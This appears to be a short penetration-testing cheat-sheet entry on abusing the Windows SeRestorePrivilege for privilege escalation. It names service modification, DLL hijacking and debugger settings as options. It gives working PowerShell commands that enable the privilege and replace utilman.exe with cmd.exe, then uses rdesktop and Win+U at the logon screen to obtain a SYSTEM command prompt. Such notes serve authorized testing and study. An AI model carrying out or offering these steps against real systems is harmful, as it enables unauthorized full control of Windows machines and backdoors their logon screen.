
Write access control to any file on the system, regardless of the files ACL. You can modify services, DLL Hijacking, set debugger (Image File Execution Options)… A lot of options to escalate.

Check the info below. You will need to have a login terminal access via RDP or physically.

# Windows Target


PS> .\EnableSeRestorePrivilege.ps1
PS> move C:\Windows\system32\utilman.exe C:\Windows\system32\utilman.exe.o
PS> move C:\Windows\system32\cmd.exe C:\Windows\system32\utilman.exe

# Assume that you have a RDP console.
Kali> rdesktop $RHOST 

At Logon Screen: Press Win+u key 

Last updated